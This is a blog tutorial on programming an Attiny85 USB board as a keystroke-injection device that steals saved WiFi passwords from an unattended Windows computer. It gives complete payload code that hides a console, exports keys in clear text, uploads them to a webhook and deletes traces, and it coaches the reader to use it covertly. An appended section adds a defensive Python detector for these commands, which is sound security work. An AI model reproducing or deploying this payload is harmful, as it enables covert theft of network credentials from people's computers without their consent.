3/14/2022

Attiny85 Rubber Ducky: WiFi Password Grabber

   _      _      _
 =(.)__ =(.)__ >(x)__
  (___/  (___/  (___/:]  

A much cheaper alternative to Hak5's USB Rubber Ducky. You can use this USB microcontroller for everything from stealing WiFi passwords to keylogging. We will focus on stealing WiFi passwords in this tutorial by creating a poor-man's USB Rubber Ducky that will discreetly steal WiFi passwords from a target computer running Windows and call back the information to a webhook in about 4-5 seconds.

Items Required:
-Attiny85 General Micro USB Development Board
-Target Computer Running Windows

Resources:
Arduino IDE
Digistump Drivers
Attiny85 Ducky Payloads 
Webhook.site

Start by downloading and installing the Digistump Drivers from GitHub. To do this, unzip the "Digistump.Drivers" zip file using 7-Zip, WinZip, etc. Open the unzipped folder, run the "Install Drivers" exe file, and continue through the setup wizard.

Once the setup process is complete it's time to move over to the Arduino IDE, which you can install from the link under "Resources:" above. In this tutorial I used the standard Arduino IDE. There is now the Arduino IDE 2.0 RC which features a more stable build. The steps in this tutorial will work with both. Once it is installed, boot up the Arduino IDE and insert your Attiny85 USB. Please note, your computer might make an alert/notification sound after discovering the device.

We will need to do some configuring to the Arduino IDE. Start by opening the Preferences window by clicking File > Preferences. Enter "http://digistump.com/package_digistump_index.json" in the field labeled "Additional Boards Manager URLs".

Next, go to Tools > Board > Board Manager and select "Contributed" from the "Type:" drop-down field. Select the package labeled "Digistump AVR Boards" and install it. From within that Boards section we can also select "Digispark (Default - 16.5mhz)" from the list of boards. Also make sure you select your Attiny85's correct COM port.

Now it's time to paste our payload. We have a lot of payload options for the Attiny85 Rubber Ducky. I suggest checking out some of them on the Attiny85 Ducky Payloads GitHub page. For this tutorial, we will be using a slightly altered version of the "Wi-Fi password stealer" created by MTK911. I found that slightly altering some of the timing within the code made it operate more smoothly.

Create a new sketch by clicking File > New and paste the code below:

#include "DigiKeyboard.h"
#define KEY_DOWN 0x51 // Keyboard Down Arrow
#define KEY_ENTER 0x28 //Return/Enter Key

void setup() {
  pinMode(1, OUTPUT); //LED on Model A 
}

void loop() {
   
  DigiKeyboard.update();
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.delay(3000);
 
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); //run
  DigiKeyboard.delay(100);
  DigiKeyboard.println("cmd /k mode con: cols=15 lines=1"); //smallest cmd window possible
  DigiKeyboard.delay(500);
  DigiKeyboard.delay(500);
  DigiKeyboard.sendKeyStroke(KEY_SPACE, MOD_ALT_LEFT); //Menu  
  DigiKeyboard.sendKeyStroke(KEY_M); //goto Move
  for(int i =0; i < 100; i++)
    {
      DigiKeyboard.sendKeyStroke(KEY_DOWN);
    }
  DigiKeyboard.sendKeyStroke(KEY_ENTER); //Detach from scrolling
  DigiKeyboard.delay(100);
  DigiKeyboard.println("cd %temp%"); //going to temporary dir
  DigiKeyboard.delay(500);
  DigiKeyboard.println("netsh wlan export profile key=clear"); //grabbing all the saved wifi passwd and saving them in temporary dir
  DigiKeyboard.delay(1000);
  DigiKeyboard.println("powershell Select-String -Path Wi*.xml -Pattern 'keyMaterial' > Wi-Fi-PASS"); //Extracting all password and saving them in Wi-Fi-Pass file in temporary dir
  DigiKeyboard.delay(1000);
  DigiKeyboard.println("powershell Invoke-WebRequest -Uri #INSERT WEBHOOK LINK HERE# -Method POST -InFile Wi-Fi-PASS"); //Submitting all passwords on hook
  DigiKeyboard.delay(1000);
  DigiKeyboard.println("del Wi-* /s /f /q"); //cleaning up all the mess
  DigiKeyboard.delay(500);
  DigiKeyboard.println("exit");
  DigiKeyboard.delay(100);
  
  digitalWrite(1, HIGH); //turn on led when program finishes
  DigiKeyboard.delay(90000);
  digitalWrite(1, LOW); 
  DigiKeyboard.delay(5000);
  
}

On line 34 of the code (the Invoke-WebRequest line), replace "#INSERT WEBHOOK LINK HERE#" with your own personal Webhook.site URL. To obtain a Webhook.site URL, you can just visit Webhook.site. This will give you your own Webhook.site control panel where you can copy the URL labeled "Your unique URL". Paste this URL into your code, replacing "#INSERT WEBHOOK LINK HERE#". Our code is now ready for upload.

Click the check mark (✔) in the top left-hand corner. This verifies the code along with the current device plugged in. Once verification is complete click the arrow (→) next to the check mark to upload the code to the Attiny85 device. You will receive a "Done uploading" message at the bottom left-hand corner of the Arduino IDE. You're ready to start grabbing some passwords!

With a target Windows computer in arm's reach, preferably unaccompanied, insert your new WiFi Password Grabbing device into an open USB slot. The device will automatically open the Windows command prompt, resize the screen to the bottom right-hand corner of the desktop (sneaky!), and will locate saved WiFi passwords on the target computer. In about 4-5 seconds, your device's LED will light up to notify you the payload is complete. Unplug the device and walk away while not looking suspicious.

Using your mobile phone or personal computer, visit your Webhook.site URL from earlier. You should have a new request! Open the request and you will find a list of SSIDs and passwords from the target computer.
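Seen from the defending side, the commands this payload types leave process-creation records that can be correlated. The following is an added example, not part of the original tutorial or MTK911's code: it scans constructed log lines for a console that exports WLAN keys in clear text and then POSTs a file. The line format (time | parent PID | PID | command line) is an assumption standing in for telemetry such as Sysmon Event ID 1 or Security event 4688 with command-line logging, and the collector.example URL is a placeholder.

```python
import re
from datetime import datetime, timedelta

# Command-line patterns taken from the payload shown on this page.
RULES = {
    "tiny_console": re.compile(r"\bmode\s+con:?\s+cols=\d+\s+lines=\d+", re.I),
    "wlan_key_export": re.compile(r"\bnetsh(\.exe)?\s+wlan\s+export\s+profile\b.*\bkey=clear\b", re.I),
    "keymaterial_grep": re.compile(r"select-string\b.*keyMaterial", re.I),
    "file_post": re.compile(r"\b(invoke-webrequest|iwr)\b(?=.*-method\s+post)(?=.*-infile\b)", re.I),
}
WINDOW = timedelta(seconds=60)  # assumption: typed payloads complete within seconds

def parse(line):
    """Assumed log format: ISO time | parent PID | PID | command line."""
    ts, ppid, pid, cmd = (f.strip() for f in line.split("|", 3))
    return {"ts": datetime.fromisoformat(ts), "ppid": int(ppid), "pid": int(pid), "cmd": cmd}

def detect(lines):
    """Alert on a console that exports WLAN keys and POSTs a file within WINDOW."""
    sessions = {}  # console PID -> [(time, rule name)]
    for ev in map(parse, lines):
        for name, rx in RULES.items():
            if rx.search(ev["cmd"]):
                # The console matches on its own command line; the tools it
                # launches are attributed to it through their parent PID.
                key = ev["pid"] if name == "tiny_console" else ev["ppid"]
                sessions.setdefault(key, []).append((ev["ts"], name))
    alerts = []
    for key, hits in sessions.items():
        names = {n for _, n in hits}
        times = [t for t, _ in hits]
        span = max(times) - min(times)
        if {"wlan_key_export", "file_post"} <= names and span <= WINDOW:
            alerts.append({"console_pid": key, "rules": sorted(names), "seconds": span.total_seconds()})
    return alerts

# Constructed sample events (not captured from a real host).
SAMPLE = [
    "2022-03-14T10:00:03 | 4120 | 7001 | cmd /k mode con: cols=15 lines=1",
    "2022-03-14T10:00:05 | 7001 | 7010 | netsh wlan export profile key=clear",
    "2022-03-14T10:00:06 | 7001 | 7015 | powershell Select-String -Path Wi*.xml -Pattern 'keyMaterial'",
    "2022-03-14T10:00:07 | 7001 | 7020 | powershell Invoke-WebRequest -Uri https://collector.example/hook -Method POST -InFile Wi-Fi-PASS",
    "2022-03-14T11:30:00 | 5200 | 8100 | netsh wlan show profiles",
    "2022-03-14T12:00:00 | 6300 | 8200 | netsh wlan export profile key=clear",
]

if __name__ == "__main__":
    for alert in detect(SAMPLE):
        print(alert)
```

The last two sample lines are benign look-alikes: a profile listing, and a key export with no upload from the same console, neither of which raises an alert.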

Your Attiny85 can be reprogrammed with different payloads. I suggest checking out the others featured on MTK911's GitHub.

2 comments:

  1. this is a really good summary and explanation! cheers

  2. I presume it's illegal to do this in most cases
